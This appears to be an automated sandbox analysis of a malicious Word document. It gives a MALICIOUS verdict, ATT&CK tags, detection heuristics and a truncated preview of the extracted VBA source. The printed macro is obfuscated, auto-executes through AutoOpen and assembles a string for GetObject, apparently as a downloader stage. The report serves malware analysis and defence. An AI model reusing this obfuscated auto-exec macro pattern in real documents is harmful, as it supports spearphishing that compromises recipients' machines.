Verdict: MALICIOUS
Risk Score: 222
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1566.001 Spearphishing Attachment
The presence of legacy WordBasic auto-exec markers and VBA macros, specifically an AutoOpen macro, indicates malicious intent. The GetObject call within the VBA p-code suggests an attempt to execute code or load external resources. While the exact payload is not discernible from the provided script, the overall pattern points to a macro-based downloader, commonly used in spearphishing attachments.
Heuristics (7)
- ClamAV: Doc.Malware.00536d-6935378-0 (critical, CLAMAV_DETECTION): ClamAV detected this file as malware: Doc.Malware.00536d-6935378-0
- VBA macros detected (medium, 3 related findings, OLE_VBA_MACROS): Document contains VBA macro code
- AutoOpen macro (high, OLE_VBA_AUTOOPEN): AutoOpen macro
- GetObject call (high, OLE_VBA_GETOBJ): GetObject call
- VBA p-code auto-exec with execution tokens (high, OLE_VBA_PCODE_AUTOEXEC_EXEC): Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
- Legacy WordBasic auto-exec macro marker (medium, OLE_LEGACY_WORDBASIC_AUTOEXEC): OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
- Embedded URL (info, EMBEDDED_URL): One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL. URL: http://schemas.openxmlformats.org/drawingml/2006/main, found in document text (OLE body).
Extracted artifacts (1)
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 7551 bytes |

SHA-256: db489b3b5b1c917ef99e6ff942b79b3eef0de6e7f51285ab16d10250fd97a33c

Preview script (first 1,000 lines of the extracted script):
Attribute VB_Name = "kkAAGQ1"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Name = "iA4AcA"
Attribute VB_Base = "0{7C8A4825-941C-4994-854C-6E605938A45B}{399398B3-E5B3-4499-9124-1038E7552D7D}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Attribute VB_Name = "D_1AQc"
Attribute VB_Base = "0{41BBE01B-01E3-47EC-9DA7-146B3FD22F79}{5FE824F5-A357-40A0-BAED-D2546415514F}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Attribute VB_Name = "pUQAZA1G"
Function UBGB1UA()
If IxQ4DAA > IxABAAk Then
OCAkA1B_ _
= 846513391 - _
ZDAACD
If ZAGAB_A < _
TAQ_ZAA Then
Hour _
Rnd _
(uwAAAX)
End If
End If
Set EUUA1Q _
= i4AAGAD
If WcBUQBC > TQAAQXD Then
I4wABAA _
= 573283557 - _
HwAAw4
If icDDCDxU < _
V4DDAZZ Then
Hour _
Rnd _
(HXAwABx)
End If
End If
Set HQ1DXG _
= pAAAkB1
End Function
Sub autoopen()
WDBAAA
End Sub
Function iAcAUQXA()
If JAZAAQAx > BADQADA Then
WcAABX _
= 232589972 - _
PkZZxBQB
If D1AAQ1BA < _
QUAA_1cx Then
Hour _
Rnd _
(i1BUCoQA)
End If
End If
Set sAUUQGA4 _
= n4GG4AAx
If zXQU_AQA > iX_BwUA Then
QA4BcAA1 _
= 414145683 - _
DAZAAX
If Ik4ABDAA < _
zAAGAcAD Then
Hour _
Rnd _
(UokUUA)
End If
End If
Set QAAoAAQU _
= ZAA1__
If S1AAcwA > okUXkcXQ Then
jAcxXXA _
= 614833377 - _
vkBQUw
If UAGDAG < _
nwcAACoA Then
Hour _
Rnd _
(OBoQAQU)
End If
End If
Set OAAAAxA _
= R41QZAw4
End Function
Attribute VB_Name = "aCcUcACB"
Function TDA_CG()
If woAUBCUA > XZZwAAAA Then
jDcBDDC _
= 347098921 - _
EZA1DX
If RAXQGoDA < _
oAGGAUA Then
Hour _
Rnd _
(CXxDQAAC)
End If
End If
Set tAXckA _
= jDXXXU
If mBAAAU > uZBxAUDA Then
RCoBCAB _
= 627438000 - _
zAAGQAoA
If fUAXXAAD < _
UwxA_U Then
Hour _
Rnd _
(CDXQAC_Q)
End If
End If
Set RAAAQxA _
= UUU_A_ZQ
End Function
Function WDBAAA()
On Error Resume Next
If jBQCUDA > BQXC11 Then
iUCDxAAA _
= 677686738 - _
Z1B_Z4
If HZQAAoA < _
YD1AA_AG Then
Hour _
Rnd _
(zA4A_oD)
End If
End If
Set RUD_QQw _
= Qw1BAoA4
If YkBAUZ > PAAAUD Then
fAQADAQ _
= 802607471 - _
jwQQDDAB
If d1ADUAAA < _
KXAc4A Then
Hour _
Rnd _
(BAQAxBD1)
End If
End If
Set RXAZDo _
= JAAABAAZ
If uocBAGA > DUACw4AA Then
pkUXDCQ _
= 999246609 - _
UckBB_
If NZABDQ < _
JoAAokcU Then
Hour _
Rnd _
(jooDGA)
End If
End If
Set DB_UAAA _
= KwAXADQA
U_wXDA = D_1AQc.VBDAAQB + D_1AQc.qUxCAA + D_1AQc.VBDAAQB + D_1AQc.nxAAQwU + D_1AQc.VBDAAQB
If sAAAAAAx > fZ1CGBQ1 Then
rDxZAAAA _
= 403035629 - _
oBUUxDZD
If EXBAAD < _
YAxBAA_ Then
Hour _
Rnd _
(VXZ41cBA)
End If
End If
Set iQxXQG _
= JAADAw
If a1AD_44 > WBU_AxDD Then
jA1cAA _
= 236025334 - _
BGUwUA
If AZBDAXQ < _
LAcGQA Then
Hour _
Rnd _
(Aw1AAwX_)
End If
End If
Set l41AQA _
= iCAAQoA
If vUADCAD > jAAD4Bx Then
E_UA4k _
= 27812718 - _
zA_oQAc
If TBAZo1 < _
c_CA44G Then
Hour _
Rnd _
(rAQ4ACAA)
End If
End If
Set pADUAA _
= LB4ADkB
Set mQwAAAA = GetObject(D_1AQc.VBDAAQB + D_1AQc.qUxCAA + D_1AQc.VBDAAQB + D_1AQc.nxAAQwU + D_1AQc.VBDAAQB + D_1AQc.tDQX4wA1 + D_1AQc.VBDAAQB)
If sCDAQQ > JwcDkQUA Then
... (truncated)